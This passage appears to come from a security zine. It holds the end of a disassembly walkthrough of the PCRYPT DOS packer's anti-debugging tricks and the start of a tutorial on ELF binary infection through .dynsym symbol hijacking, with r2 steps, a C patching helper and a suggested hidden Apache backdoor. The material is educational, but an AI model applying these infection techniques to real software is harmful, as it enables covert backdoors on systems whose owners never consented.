0000:0831 cf iret ; Finish servicing the isr


Which will move the instruction pointer two bytes forward to the fnop instructions at 0996: 


0000:0996 d9d0 fnop ; INT6 handler returns here
0000:0998 d9d0 fnop
0000:099a 0f23c8 mov dr1, eax ; Scrap the debug registers
0000:099d d9d0 fnop ; Just in case someone is watching
0000:099f 0f23d8 mov dr3, eax ; Ditto
0000:09a2 0f20c0 mov eax, cr0 ;
0000:09a5 d9d0 fnop ;
0000:09a7 0f22c0 mov cr0, eax ; Do funny stuff with cr0
0000:09aa d9d0 fnop
0000:09ac ea00002700 ljmp 0x27:0 ; Jump to linear address 0000 0270
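
The return-address adjustment done by the INT6 handler can be modeled in a few lines. For a fault such as #UD, the CPU saves the address of the faulting instruction itself, so the handler has to advance the saved ip past it before iret. The struct and function names below are made up for this sketch, and the cs value in the usage note is a placeholder.

```c
#include <stdint.h>

/* Words pushed by a real-mode interrupt, lowest address first. */
struct isr_frame {
    uint16_t ip;
    uint16_t cs;
    uint16_t flags;
};

/* Mimic "add word [bp + 2], 2" from the handler: after "push bp",
 * [bp + 2] is the saved ip. Advancing it by the length of the
 * faulting bytes makes iret resume right after them.
 * The names are hypothetical. */
void skip_faulting_bytes(struct isr_frame *frame, uint16_t length)
{
    frame->ip = (uint16_t)(frame->ip + length);
}
```

Starting from a saved ip of 0x0994 (the two ff bytes), a length of 2 gives 0x0996, the first fnop.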


You may be wondering what is at the address 0000:0270? Well, remember the strange writes to 0000:0270 by the 
code at 0928? 


0000:0928 c7067002ea00 mov word [0x270], 0xea ; Set 0000:0270 to ea 00
0000:092e 8bc6 mov ax, si ; ax = 0x6be
0000:0930 05f302 add ax, 0x2f3 ; ax = 0x9b1
0000:0933 a37102 mov word [0x271], ax ; Set 0000:0271 = ax
0000:0936 8c0e7302 mov word [0x273], cs ; Set 0000:0273 = cs


;; Note that while my listing shows the leading code segment as 0000 throughout 
;; the whole text, cs is in fact far away in memory, pointing where the DOS loader 
;; loaded the original COM file and then moved back by 1 as stage 3 was executed. 


This data will now be jumped to and executed: 
;; The segment listed here is in fact zero 


;; Jump to pointer (cs:09b1) that was written here at 0933 
0000:0270 ea b109:[cs] jmp ptr16:32 


The execution will continue at cs:09b1, that is 


0000:09b1 4b dec bx
0000:09b2 75d9 jne 0x98d


This decrements bx and, if it’s not equal to zero, jumps back to cs:098d, which starts the process of decrypting the
next byte. The location 98d is marked with a (*) in the listing.


If bx is zero, then the jump is not taken and the code continues execution: 


0000:09b4 0bed or bp, bp
0000:09b6 7413 je 0x9cb ; Jump taken
;; Call the function that checks for constants in the idle interrupt handler again
0000:09cb e8acfe call 0x87a
0000:087a 6a00 push 0
0000:087c 1f pop ds
0000:087d c536a000 lds si, [0xa0]
0000:0881 ad lodsw ax, word [si]
0000:0882 3d9cfb cmp ax, 0xfb9c
0000:0885 750c jne 0x893
0000:0887 ad lodsw ax, word [si]
0000:0888 3d3d55 cmp ax, 0x553d
0000:088b 7506 jne 0x893
0000:088d ad lodsw ax, word [si]
0000:088e 3d2d75 cmp ax, 0x752d
0000:0891 7401 je 0x894
0000:0893 c3 ret ; Side effect, ds = 0000
0000:09ce 07 pop es ;
0000:09cf 1f pop ds ; Set es and ds = 0100
0000:09d0 1e push ds ;
0000:09d1 06 push es ;
0000:09d2 e80000 call 0x9d5
0000:09d5 5e pop si
0000:09d6 83c628 add si, 0x28 ; si = 0x9fd
0000:09d9 90 nop
0000:09da 0e push cs
0000:09db 07 pop es ; es = cs
0000:09dc 8cd8 mov ax, ds ;
0000:09de 051000 add ax, 0x10 ;
0000:09e1 8ed8 mov ds, ax ; Move ds by 0x10
0000:09e3 2e0104 add word cs:[si], ax ; Self modifying code again,
                                      ; word cs:9fd = ds+0x10
0000:09e6 83c605 add si, 5 ;
0000:09e9 90 nop
0000:09ea 2e0104 add word cs:[si], ax ; word cs:a02 = ds + 0x10
0000:09ed 07 pop es
0000:09ee 1f pop ds
0000:09ef 61 popaw
0000:09f0 b001 mov al, 1 ;
0000:09f2 3c01 cmp al, 1 ; I will let you guess
0000:09f4 7409 je 0x9ff ; if this is taken or not
0000:09f6 60 pushaw
0000:09f7 1e push ds
0000:09f8 06 push es
0000:09f9 b80000 mov ax, 0
0000:09fc bb0000 mov bx, 0 ; Immediate value changed,
0000:09ff ea0001f07c ljmp 0x____:0x100 ; jump to linear address
     0a02                              ; target segment is modified
                                       ; by add at 9ea


Sometimes when the thing you are looking at does not make sense at all, it’s worth taking a few steps back and
looking around. At first the instructions from 90e onwards didn’t make any sense at all, because I had made an error
when rewriting the stage 1 decryptor program. Originally it was loading the COM file into an array. Because of the
COM load offset, all array accesses needed to be offset as well. This was bad for code readability. I rewrote the
code to use a larger array and load the file at offset 0x100.


But I forgot to remove the offset from the length constant, which means the last 0x100 bytes to be decrypted by
stage 1 were never decrypted. But when I fixed that error, suddenly the beginning of stage 3 code became
corrupted. I had already analyzed it at that point and I knew that there needed to be correct code there. Something
was wrong.


Then it hit me: the stage 2 key LUT starts at 9f4 and goes up to be2. It should NOT be overwritten! This breaks the
encryption! The original code overwrites the first 30 bytes of the stage 2 key lookup table, thus breaking the first 30
bytes of stage 3 code. There is a bug in this particular packer version!


I changed stage 1 code to end demangling at 9f3, and suddenly the code in both stage 3 and 4 made perfect sense.
I think that this version of PCRYPT is broken, because I cannot find any other executables that use it online. There
are a few v3.45 PCRYPT binaries. There’s a file list of a Russian BBS that lists two distributions of PCRYPT: v3.44 and
v3.45. According to that file, version 3.45 was released just 12 days after 3.44:


PCRYP345.RAR 27417 02-09-97 +=============| PCRYPT v3.45 |=+
                            | Encryptor of COM and EXE files   |
                            | * Works fast.                    |
                            | * Small size.                    |
                            | * Protection against debugging.  |
                            | * Protection against modification. |
                            | * Written entirely in assembler. |
                            | * Personal registration.         |
                            | Copyright (c) 1997 by MERLiN     |
                            +===============[ 01 Sep 1997 ]=+


;; stage 4
;; INT3 handler
0000:0842 56 push si ;
0000:0843 1e push ds ;
0000:0844 51 push cx ; Save si, ds, cx
0000:0845 0e push cs ;
0000:0846 1f pop ds ; ds = cs
0000:0847 6650 push eax ; Save eax
0000:0849 fc cld ; Clear direction flag
0000:084a 0f20c0 mov eax, cr0 ;
0000:084d 0f22c0 mov cr0, eax ; Do nothing with cr0
0000:0850 6658 pop eax ; Restore eax
0000:0852 e80000 call 0x855 ;
0000:0855 5e pop si ; si = 0x855
0000:0856 50 push ax ; stack words = ax cx ds si
0000:0857 8bc6 mov ax, si ; ax = 0x855
0000:0859 81c6a303 add si, 0x3a3 ; si = 0xbf8
0000:085d 057901 add ax, 0x179 ; ax = 0x9ce, si + 0x179
0000:0860 3904 cmp word [si], ax ; Compare 9ce and *(cs:0bf8)
0000:0862 58 pop ax ; Restore ax
0000:0863 7205 jb 0x86a ; Jump if below (CF=1)
0000:0865 0f23d2 mov dr2, edx ; Write dx to dr2
0000:0868 8914 mov word [si], dx ; Load dx (8ab) to cs:0bf8
0000:086a ff04 inc word [si] ; Increase the counter (0xbf8)
0000:086c 8b34 mov si, word [si] ; Load counter to si
0000:086e 4e dec si ; Decrement si
0000:086f 8ae0 mov ah, al ; ah = al
0000:0871 ac lodsb al, byte [si] ; Load second ciphertext
0000:0872 32e0 xor ah, al ; ah ^= al -- decrypt
0000:0874 8ac4 mov al, ah ; Move cleartext byte to al
0000:0876 59 pop cx ;
0000:0877 1f pop ds ;
0000:0878 5e pop si ; Restore si, ds, cx
0000:0879 cf iret ; Return from interrupt.
;; Interrupt code check function
0000:087a 6a00 push 0 ;
0000:087c 1f pop ds ; ds = 0000
0000:087d c536a000 lds si, [0xa0] ; INT28 handler - DOS Idle Interrupt
;; load ds:si with segment:offset from 0xa0
0000:0881 ad lodsw ax, word [si] ; ax = ds:si, si += 2
0000:0882 3d9cfb cmp ax, 0xfb9c
0000:0885 750c jne 0x893
0000:0887 ad lodsw ax, word [si]
0000:0888 3d3d55 cmp ax, 0x553d
0000:088b 7506 jne 0x893
0000:088d ad lodsw ax, word [si]
0000:088e 3d2d75 cmp ax, 0x752d
0000:0891 7401 je 0x894
0000:0893 c3 ret ; Return from call
0000:0894 ea0000ffff ljmp 0xffff:0 ; Invalid address
;; INT1 handler. ISR stack words are = ip cs flags
0000:0899 8bec mov bp, sp ; bp = sp
0000:089b 897600 mov word [bp], si ; Set return ip to si
0000:089e 8c4e02 mov word [bp + 2], cs ; Set return segment to cs
0000:08a1 6633c0 xor eax, eax ; Clear eax
0000:08a4 0f23f8 mov dr7, eax ; Clear all bp conditions
0000:08a7 0f23c0 mov dr0, eax ; Clear dr0
0000:08aa cf iret ; Continue execution at cs:si
;; new INT1 handler
0000:08ab aa stosb byte es:[di], al ; Save al to es:di, di++
0000:08ac cf iret ; Return from interrupt
;; stage 4 entry point
0000:08ad e8caff call 0x87a ; Call subroutine at 87a
0000:08b0 07 pop es ; es = 0100 (cs)
0000:08b1 1f pop ds ; ds = 0100 (cs)
0000:08b2 61 popaw
0000:08b3 60 pushaw
0000:08b4 1e push ds
0000:08b5 06 push es
0000:08b6 b0b6 mov al, 0xb6 ; PIT command b6: ch1,
0000:08b8 e643 out 0x43, al ; access lo/hi, mode 2, 16 bit
0000:08ba b0ff mov al, 0xff ;
0000:08bc e640 out 0x40, al ;
0000:08be e640 out 0x40, al ; Load 0xffff to PIT ch 1.


0000:08c0 b430 mov ah, 0x30 ; INT 21h, ah=0x30:
0000:08c2 cd21 int 0x21 ; Get DOS version
0000:08c4 3c02 cmp al, 2 ; Compare maj version with 2
0000:08c6 7305 jae 0x8cd ; Jump above or equal
0000:08c8 33c0 xor ax, ax ; ax = 0
0000:08ca 06 push es ; es = cs
0000:08cb 50 push ax
0000:08cc cb retf ; Pull cs:0000 and jump there
0000:08cd b430 mov ah, 0x30
0000:08cf cd21 int 0x21 ; Get DOS version again
;; PSP:02 segment of first byte beyond memory allocated to program
0000:08d1 8b2e0200 mov bp, word [2] ; bp = *(0100:0002);
;; PSP:2c DOS 2+ environment for process
0000:08d5 8b1e2c00 mov bx, word [0x2c] ; bx = *(0100:002c)
0000:08d9 bf5553 mov di, 0x5355 ; di = 0x5355 "SU"
0000:08dc b94b43 mov cx, 0x434b ; cx = 0x434b "CK"
0000:08df b430 mov ah, 0x30 ; Get DOS version (3rd time)
0000:08e1 cd21 int 0x21 ;
0000:08e3 3c02 cmp al, 2 ; Either case continues
0000:08e5 7300 jae 0x8e7 ; code execution.
0000:08e7 33c0 xor ax, ax
0000:08e9 bf0000 mov di, 0
0000:08ec 8b00 mov ax, word [bx + si]
0000:08ee 90 nop
0000:08ef 2bf7 sub si, di
0000:08f1 bf5553 mov di, 0x5355 ; SUCK again
0000:08f4 b94b43 mov cx, 0x434b
0000:08f7 e80000 call 0x8fa ;
0000:08fa 5e pop si ; si = 0x8fa
0000:08fb 81c6fe02 add si, 0x2fe ; si = 0xbf8
0000:08ff 2ec704ffff mov word cs:[si], 0xffff ; cs:0bf8 = 0xffff
0000:0904 e80000 call 0x907 ;
0000:0907 5e pop si ; si = 0x907
;; si = 0x6be now points at start of what stage 1 decrypted (cs has changed)
0000:0908 81ee4902 sub si, 0x249 ; si = 0x6be
0000:090c 1e push ds ; Save ds. stack = 01 00...
0000:090d 6a00 push 0 ;
0000:090f 1f pop ds ; ds = 0000
0000:0910 8bc6 mov ax, si ; ax = 0x6be
;; ax = 0x842 points at start of what stage 3 decrypted (cs has changed)
0000:0912 058401 add ax, 0x184 ; ax = 0x842
0000:0915 a30c00 mov word [0xc], ax ;
0000:0918 8c0e0e00 mov word [0xe], cs ; Set INT3 to cs:0842
0000:091c 8bc6 mov ax, si ; ax = 0x6be
0000:091e 056a01 add ax, 0x16a ; ax = 0x828
0000:0921 a31800 mov word [0x18], ax ;
0000:0924 8c0e1a00 mov word [0x1a], cs ; Set INT6 to cs:0828
0000:0928 c7067002ea00 mov word [0x270], 0xea ; Set 0000:0270 to ea 00
0000:092e 8bc6 mov ax, si ; ax = 0x6be
0000:0930 05f302 add ax, 0x2f3 ; ax = 0x9b1
0000:0933 a37102 mov word [0x271], ax ; Set 0000:0271 = ax
0000:0936 8c0e7302 mov word [0x273], cs ; Set 0000:0273 = cs
0000:093a 56 push si ; stack = be 06
0000:093b e80000 call 0x93e ;
0000:093e 5e pop si ; si = 0x93e
0000:093f 56 push si ; stack = 3e 09 be 06
0000:0940 83c61d add si, 0x1d ; si = 0x95b
0000:0943 90 nop
0000:0944 66b84de80f00 mov eax, 0xfe84d ;
0000:094a 0f23c0 mov dr0, eax ; Set 0xfe84d as breakpoint 0
0000:094d 66b803000000 mov eax, 3 ;
0000:0953 0f23f8 mov dr7, eax ; Set breakpoint 0 conditions


     0000:0956 ea4de800f0 ljmp 0xf000:0xe84d ; Jump to lin. address = 000f e84d
     ;; Long jump triggers INT1
     0000:095b 5e pop si ; si = 0x93e
     0000:095c 81c66dff add si, 0xff6d ; si = 0x08ab (overflow)
     0000:0960 6a00 push 0 ;
     0000:0962 1f pop ds ;
     0000:0963 89360400 mov word [4], si ;
     0000:0967 8c0e0600 mov word [6], cs ; Set INT 1 handler to cs:08ab
     0000:096b 5e pop si ; si = 0x6be
     0000:096c 1f pop ds ; ds = 0x0100
     0000:096d 8cd8 mov ax, ds ; ax = 0x0100
     0000:096f 051000 add ax, 0x10 ; ax = 0x0110
     0000:0972 8ed8 mov ds, ax ; ds = 0x0110
     0000:0974 1e push ds ;
     0000:0975 07 pop es ; es = 0x0110
     0000:0976 8bd6 mov dx, si ; dx = 0x08ab
     0000:0978 bd0000 mov bp, 0 ; bp = 0
     0000:097b fc cld ; Clear direction flag
     0000:097c 9b wait ; Wait for BUSY# to go high
     0000:097d dbe3 fninit ; Initialize FPU
     0000:097f b168 mov cl, 0x68 ; cl = 0x68
     0000:0981 0bed or bp, bp ; Set zero flag (ZF=1)
     0000:0983 7441 je 0x9c6 ; Jump is taken
     0000:0985 33db xor bx, bx
     0000:0987 be0300 mov si, 3 ; si = 0x03
     0000:098a bf0000 mov di, 0 ; di = 0x00
     ;; ds:si points at the first byte of the executable
     ;; (after the jmp 0x64a at the very beginning)
(*)->0000:098d ac lodsb al, byte [si] ; al = ds:si, al = 0x81. si++
     0000:098e d2c0 rol al, cl ; Rotate al
     0000:0990 32c1 xor al, cl ; Xor al with 0x68
     0000:0992 cc int3 ; Call INT3 handler (cs:0832)
     0000:0993 f1 int1 ; Call INT1 handler (cs:08ab)
     0000:0994 ff invalid ; Trigger INT6 handler
     0000:0995 ff invalid
     0000:0996 d9d0 fnop ; INT6 handler returns here
     0000:0998 d9d0 fnop
     0000:099a 0f23c8 mov dr1, eax ; Scrap the debug registers
     0000:099d d9d0 fnop ; Just in case someone's watching
     0000:099f 0f23d8 mov dr3, eax
     0000:09a2 0f20c0 mov eax, cr0
     0000:09a5 d9d0 fnop
     0000:09a7 0f22c0 mov cr0, eax ; Do funny stuff with cr0
     0000:09aa d9d0 fnop
     0000:09ac ea00002700 ljmp 0x27:0 ; Jump to linear address 0000 0270
     0000:09b1 4b dec bx
     0000:09b2 75d9 jne 0x98d
     0000:09b4 0bed or bp, bp
     0000:09b6 7413 je 0x9cb ; Jump taken
     0000:09b8 dec bp
     0000:09b9 mov ax, ds
     0000:09bb add ax, 0x1000
     0000:09be mov ds, ax
     0000:09c0 mov es, ax
     0000:09c2 or bp, bp
     0000:09c4 jne 0x987
     0000:09c6 bb3705 mov bx, 0x537 ; bx = 0x537
     0000:09c9 ebbc jmp 0x987
     0000:09cb e8acfe call 0x87a
     0000:09ce 07 pop es


0000:09cf 1f pop ds ; Set es and ds = 0100
0000:09d0 1e push ds ;
0000:09d1 06 push es ;
0000:09d2 e80000 call 0x9d5
0000:09d5 5e pop si
0000:09d6 83c628 add si, 0x28 ; si = 0x9fd
0000:09d9 90 nop
0000:09da 0e push cs
0000:09db 07 pop es ; es = cs
0000:09dc 8cd8 mov ax, ds ;
0000:09de 051000 add ax, 0x10 ;
0000:09e1 8ed8 mov ds, ax ; Move ds by 0x10
0000:09e3 2e0104 add word cs:[si], ax ; Self modifying code again,
                                      ; word cs:9fd = ds+0x10
0000:09e6 83c605 add si, 5 ;
0000:09e9 90 nop
0000:09ea 2e0104 add word cs:[si], ax ; word cs:a02 = ds + 0x10
0000:09ed 07 pop es
0000:09ee 1f pop ds
0000:09ef 61 popaw
0000:09f0 b001 mov al, 1 ;
0000:09f2 3c01 cmp al, 1 ; I will let you guess
0000:09f4 7409 je 0x9ff ; if this is taken or not
0000:09f6 60 pushaw
0000:09f7 1e push ds
0000:09f8 06 push es
0000:09f9 b80000 mov ax, 0
0000:09fc bb0000 mov bx, 0 ; Immediate value changed
0000:09ff ea0001f07c ljmp 0x____:0x100 ; Jump to linear address


;; There are a few nonsense instructions here, then the PCRYPT banner starts 


Stage 4 calls the code at [0x7cf0+ds+0x10]:0100. I think this is a good point to end this analysis, as I have not
decrypted what lands there, and this file is getting long. I hope you enjoyed this read and learnt something new.


Reverse engineering this packer was a very valuable journey into static analysis and DOS programming. It expanded
my x86 knowledge greatly and was a lot of fun to do. It’s not finished yet, as stage 4 jumps to more code that still is
not the original binary. And after I crack that part, I still have to reverse the original program :) ...


Overall I really like the design of this packer. It’s a COM file that just keeps on giving. I have no guarantee that stage
5 will be the last one; there are still a few hundred bytes that have not been touched yet. There is an unpacker for it,
but I thought that documenting how the program works, both in terms of encryption/obfuscation of the original
binary and of its own contents, is valuable not only for me but also for others. This is the main reason why I wrote so
much of this text instead of just my own comments on the side of the disassembled code.


I’ve been using the following materials during this project:


- Intel 80386 Programmer’s Reference Manual (there is a nice 1986 typed copy online)
- Ralf Brown’s Interrupt List (RBIL)
- OSDEV wiki
- David Jurgens’ HelpPC (HTTP mirror: https://stanislavs.org/helppc/ )


These are indispensable when doing DOS reverse engineering. For learning x86 (and other) assembly language
through reverse engineering (and static analysis!), I recommend Dennis Yurichev’s book “Reverse Engineering for
Beginners”, known as RE4B.


As for the disassembler, due to the sheer amount of comments I had to add, I just copied radare’s output into a text
file and then worked on that. Ghidra and IDA would probably work well too for disassembly. r2’s and Ghidra’s
decompilers are no good for it.

That’s all for this work. If you liked this text, have some comments, or just want to say hello, drop me a line at 
gorplop@sdf.org. 


Cheers 


~gorplop 




ELF Binaries: One Algorithm to Infect Them All 
Authored by sad0p 


ELF (Executable and Linking Format) is the standard format for organizing data and code that will occupy a
process’s image and its memory dump when a crash occurs (commonly referred to as a “core dump”) in Unix-like
environments. You can find the format utilized for executable binaries, relocatable object files (files ending in .o),
shared libraries/shared objects (files ending in .so), kernel modules (files ending in .ko), and firmware (files ending in
.bin but containing program or application specific code and data embedded in ELF) on platforms including mobile
phones, PCs, embedded systems (game consoles, IoT, IIoT, etc.), and servers. Due to the popularity of the ELF
format, there has been a steady stream of research into its instrumentation. One particular area of interest that we
will focus on is the insertion of malicious code (referred to as parasitic code from here on out) into an ELF binary
while keeping its original functionality.


In this piece, we’ll walk through ELF binary infection by example. To get the most out of this, I encourage the
reader to familiarize themselves with the ELF standard (see references at the end) or use it as a guide in parallel with
the information here.


Inserting parasitic code into an ELF binary is commonly called “ELF binary infection.” ELF binary infection at the
“highest quality” often involves using infection algorithms. These algorithms generally target ELF under one of its
use cases. For example, an executable that is either dynamically or statically linked could be infected with the Text
Segment Padding or PT_NOTE to PT_LOAD algorithm on 32-bit or 64-bit Intel architecture (we focus primarily on
x86_64 and x86 for the entirety of the paper). However, infecting a shared object (library) with either Text Segment
Padding or PT_NOTE to PT_LOAD would present a hurdle for parasitic code execution, as most shared objects do
not utilize an entry point (the dynamic/runtime linker and loader being one exception) and consequently won’t be
executed directly by a user or the system. Instead, shared libraries are mapped into the process’s image by the
dynamic linker (ld-linux-*.so.*) when it identifies dependencies (references to code or data not readily available in
the executable but part of a shared object).


One possible circumvention to this problem might involve hooking/hijacking an exported symbol in a shared library. 
You locate the symbol of the desired function in the .dynsym section and change its value (the address) to that of your 
parasitic payload. Then, when an application linked against the shared library calls the function associated with the 
hijacked symbol, the parasite executes instead. 


/* testlib.h */
void func1();
void func2();


/* main.c */
#include "testlib.h"

int main() {
    func1();
}


/* testlib.c */
#include<stdio.h>
#include "testlib.h"

void func1() {
    printf("This is func1\n");
}

void func2() {
    printf("This is func2\n");
}


We compile testlib.c to produce testlib.so, our shared library: 
sh-5.1$ gcc -c testlib.c -o testlib.o -fPIC 


sh-5.1$ gcc -shared testlib.o -o testlib.so 


Our application (main.c) is compiled and dynamically linked against testlib.so as follows: 


sh-5.1$ gcc main.c ./testlib.so -o main 


Running the application will produce the expected result. 
sh-5.1$ ./main 


This is func1 


sh-5.1$ 


We can examine the exports of testlib.so with ‘radare2’ (r2): 


sh-5.1$ radare2 -w testlib.so 
ERROR: Cannot determine entrypoint, using 0x00001040 
WARN: run r2 with -e bin.cache=true to fix relocations in disassembly 
 -- Command layout is: <repeat><command><bytes>@<offset>. For example: 3x20@0x33 will show 3 hexdumps of 20 bytes at 0x33 
[0x00001040]> iE 
[Exports] 

nth paddr      vaddr      bind   type size lib name 
6   0x00001109 0x00001109 GLOBAL FUNC 22       func1 
7   0x0000111f 0x0000111f GLOBAL FUNC 22       func2 
[0x00001040]> 

From this, we can see that the symbol func1 has a value of 0x00001109 and the func2 symbol has a value of 
0x0000111f. These values correspond to the addresses of func1 and func2, respectively. We can verify this by running 
‘objdump -d testlib.so’: 


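0000000000001109 <func1>: 
    1109: 55                      push %rbp 
    110a: 48 89 e5                mov  %rsp,%rbp 
    110d: 48 8d 05 ec 0e 00 00    lea  0xeec(%rip),%rax   # 2000 <_fini+0xec8> 
    1114: 48 89 c7                mov  %rax,%rdi 
    1117: e8 14 ff ff ff          call 1030 <puts@plt> 
    111c: 90                      nop 
    111d: 5d                      pop  %rbp 
    111e: c3                      ret 

000000000000111f <func2>: 
    111f: 55                      push %rbp 
    1120: 48 89 e5                mov  %rsp,%rbp 
    1123: 48 8d 05 e4 0e 00 00    lea  0xee4(%rip),%rax   # 200e <_fini+0xed6> 
    112a: 48 89 c7                mov  %rax,%rdi 
    112d: e8 fe fe ff ff          call 1030 <puts@plt> 
    1132: 90                      nop 
    1133: 5d                      pop  %rbp 
    1134: c3                      ret 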


From here, all we need to do is modify the symbol value of func1 to that of func2 with r2, but first, we have to locate 
the .dynsym section. Running ‘readelf -S testlib.so’ will print out our section header table. From there, we can use 
the address field in the output to help us locate it in r2 for patching. 


sh-5.1$ readelf -S testlib.so 
There are 28 section headers, starting at offset 0x33a8: 

Section Headers: 
  [Nr] Name              Type             Address           Offset 
       Size              EntSize          Flags  Link  Info  Align 
  [ 0]                   NULL             0000000000000000  00000000 
       0000000000000000  0000000000000000           0     0     0 
  [ 1] .note.gnu.pr[...] NOTE             00000000000002a8  000002a8 
       0000000000000030  0000000000000000   A       0     0     8 
  [ 2] .note.gnu.bu[...] NOTE             00000000000002d8  000002d8 
       0000000000000024  0000000000000000   A       0     0     4 
  [ 3] .gnu.hash         GNU_HASH         0000000000000300  00000300 
       0000000000000028  0000000000000000   A       4     0     8 
  [ 4] .dynsym           DYNSYM           0000000000000328  00000328 
       00000000000000c0  0000000000000018   A       5     1     8 

Entry #4 is the section header table entry for .dynsym in the previous output. We can seek to this address in ‘r2’: 


sh-5.1$ radare2 -w testlib.so 
Cannot determine entrypoint, using 0x00001040 
run r2 with -e bin.cache=true to fix relocations in disassembly 
-- Change the UID of the debugged process with child.uid (requires root) 
s 0x00000328 


px 


Above we can see the hex dump of .dynsym. If you look at the line for offset 0x000003b8 and move 8 bytes over, you 
will see a familiar value, “0911000000000000”; that is the little-endian form of the func1 symbol value, the address of 
func1. This is our target. Below is the structure of each symbol if you are curious as to what the other fields in the 
hex dump might be. 


typedef struct elf64_sym { 
    Elf64_Word    st_name;   /* Symbol name, index in string tbl */ 
    unsigned char st_info;   /* Type and binding attributes */ 
    unsigned char st_other;  /* No defined meaning, 0 */ 
    Elf64_Half    st_shndx;  /* Associated section index */ 
    Elf64_Addr    st_value;  /* Value of the symbol */ 
    Elf64_Xword   st_size;   /* Associated symbol size */ 
} Elf64_Sym; 
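
The file offset of a symbol's st_value field follows directly from this layout. The sketch below is only an illustration of that arithmetic: `sym_value_offset` is a hypothetical helper name, and it assumes a Linux toolchain that ships `<elf.h>`. The inputs in the usage note are the .dynsym offset (0x328) from the ‘readelf -S’ output and the index of func1 (6) from the r2 export list.

```c
#include <assert.h>   /* static_assert (C11) */
#include <elf.h>      /* Elf64_Sym; assumes a Linux toolchain that ships <elf.h> */
#include <stddef.h>   /* offsetof */
#include <stdint.h>

/* On x86_64 every .dynsym entry is 24 bytes and st_value sits 8 bytes in. */
static_assert(sizeof(Elf64_Sym) == 24, "unexpected Elf64_Sym size");
static_assert(offsetof(Elf64_Sym, st_value) == 8, "unexpected st_value offset");

/* Hypothetical helper: file offset of the st_value field of the index-th
 * entry of a .dynsym section that starts at file offset dynsym_off. */
static uint64_t sym_value_offset(uint64_t dynsym_off, uint32_t index)
{
    return dynsym_off + (uint64_t)index * sizeof(Elf64_Sym)
           + offsetof(Elf64_Sym, st_value);
}
```

Calling `sym_value_offset(0x328, 6)` gives 0x3c0: the entry for func1 begins on the 0x3b8 line of the hex dump, and its st_value field starts 8 bytes later.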


Continuing with our exercise, we successfully seek to the start of the address we want to overwrite. Then modify the 
value there with the func2 symbol value, exit, and rerun the main application. 


[r2 session: seek to the st_value field of func1, write the value 0x0000111f, quit r2, and rerun the main application] 

This is func2 

We have successfully redirected execution to func2 via symbol hijacking. 
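
The manual patch can also be expressed in a few lines of C. This is a minimal sketch, not a complete infector: it assumes the .dynsym entries and the .dynstr string table have already been read into memory, and the function names `find_sym` and `hijack_symbol` are our own. Writing the modified table back to the file is left out.

```c
#include <assert.h>
#include <elf.h>      /* Elf64_Sym; assumes a Linux toolchain that ships <elf.h> */
#include <stddef.h>
#include <string.h>

/* Return the index of the symbol called `name`, or -1 if it is absent.
 * `strtab` is the string table that st_name indexes into (.dynstr). */
static long find_sym(const Elf64_Sym *syms, size_t count,
                     const char *strtab, const char *name)
{
    assert(syms != NULL && strtab != NULL && name != NULL);
    for (size_t i = 0; i < count; i++)
        if (strcmp(strtab + syms[i].st_name, name) == 0)
            return (long)i;
    return -1;
}

/* Point `victim` at the code of `donor` by copying the donor's st_value.
 * Returns 0 on success, -1 if either symbol is missing. */
static int hijack_symbol(Elf64_Sym *syms, size_t count, const char *strtab,
                         const char *victim, const char *donor)
{
    long v = find_sym(syms, count, strtab, victim);
    long d = find_sym(syms, count, strtab, donor);
    if (v < 0 || d < 0)
        return -1;
    syms[v].st_value = syms[d].st_value;
    return 0;
}
```

With the tables from testlib.so loaded, `hijack_symbol(syms, count, dynstr, "func1", "func2")` would reproduce the r2 edit: the func1 entry ends up holding 0x111f.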


Considering our target binaries could have been part of a large software suite (Apache HTTP Server for example), 
where we hijack request handling functionality to insert our logic, we could insert code that searches the HTTP 
request for a magic number identifying a “client” who wants to access the backdoor functionality. Such an infection 
would allow us to blend in with regular HTTP traffic via one of Apache’s trusted modules. In many cases, the system 
admin and network analyst would likely be no wiser. However, the limitation of this approach is that we would need 
an ELF binary to call the function linked to the exported and hijacked symbol. So let us look at how we can get code 
execution simply by having an ELF binary run when linked against an infected shared object. 


To demonstrate this technique, we’ll first target a dynamically linked “dummy” program: 


/* 
ctors.c 
compile: 
*/ 

#include<stdio.h> 

__attribute__((constructor)) void msg(int argc, char **argv) { 
    printf("hello from msg() constructor\n"); 
} 

__attribute__((constructor)) void second() { 
    printf("hello from second() constructor\n"); 
} 

void not_called() { 
    puts("I should have never been called\n"); 
} 

int main() { 
    puts("hello from main -- hopefully all constructors were called.\n"); 
    return 0; 
} 

This program is simple; it has two functions with constructor attributes. The constructor attribute causes the 
functions labeled with it to execute before the *main* function, in the order they are defined. Finally, there 
is a *not_called* function that should not be reached/executed under normal circumstances. Our dummy program 
will be called “ctors” and the associated source file “ctors.c”. Compilation instructions are in the comments in the 
source code. Executing the resulting binary yields the expected results: 


[sad0p@Arch-Deliberate experimental]$ ./ctors 
hello from msg() constructor 
hello from second() constructor 
hello from main -- hopefully all constructors were called. 

[sad0p@Arch-Deliberate experimental]$ 


Using the ‘nm’ command (list symbols in our binary) and piping the output to ‘grep’ to look for our *msg* function will 
yield its position in our program. We then disassemble the binary with ‘objdump’ to verify that the function is at that 
location. 


[sad0p@Arch-Deliberate experimental]$ nm ctors | grep msg 
0000000000001139 T msg 
[sad0p@Arch-Deliberate experimental]$ objdump -d ctors | grep 1139 -A 20 
0000000000001139 <msg>: 
    1139: 55                      push  %rbp 
    113a: 48 89 e5                mov   %rsp,%rbp 
    113d: 48 83 ec 10             sub   $0x10,%rsp 
    1141: 89 7d fc                mov   %edi,-0x4(%rbp) 
    1144: 48 89 75 f0             mov   %rsi,-0x10(%rbp) 
    1148: 48 8d 05 b9 0e 00 00    lea   0xeb9(%rip),%rax   # 2008 <_IO_stdin_used+0x8> 
    114f: 48 89 c7                mov   %rax,%rdi 
    1152: e8 d9 fe ff ff          call  1030 <puts@plt> 
    1157: 90                      nop 
    1158: c9                      leave 
    1159: c3                      ret 

000000000000115a <second>: 
    115a: 55                      push  %rbp 
    115b: 48 89 e5                mov   %rsp,%rbp 
    115e: 48 8d 05 c3 0e 00 00    lea   0xec3(%rip),%rax   # 2028 <_IO_stdin_used+0x28> 
    1165: 48 89 c7                mov   %rax,%rdi 
    1168: e8 c3 fe ff ff          call  1030 <puts@plt> 
    116d: 90                      nop 
    116e: 5d                      pop   %rbp 
    116f: c3                      ret 
[sad0p@Arch-Deliberate experimental]$ 


Historically, the ELF and ABI (Application Binary Interface) standards handled the execution of constructor routines 
in the *.ctors* and *.init* sections of the binary. However, in later versions of the standard, the mechanism involving 
*.init* and *.ctors* for constructor execution was replaced with *.init_array* and the *dynamic tag* entry DT_INIT_ARRAY 
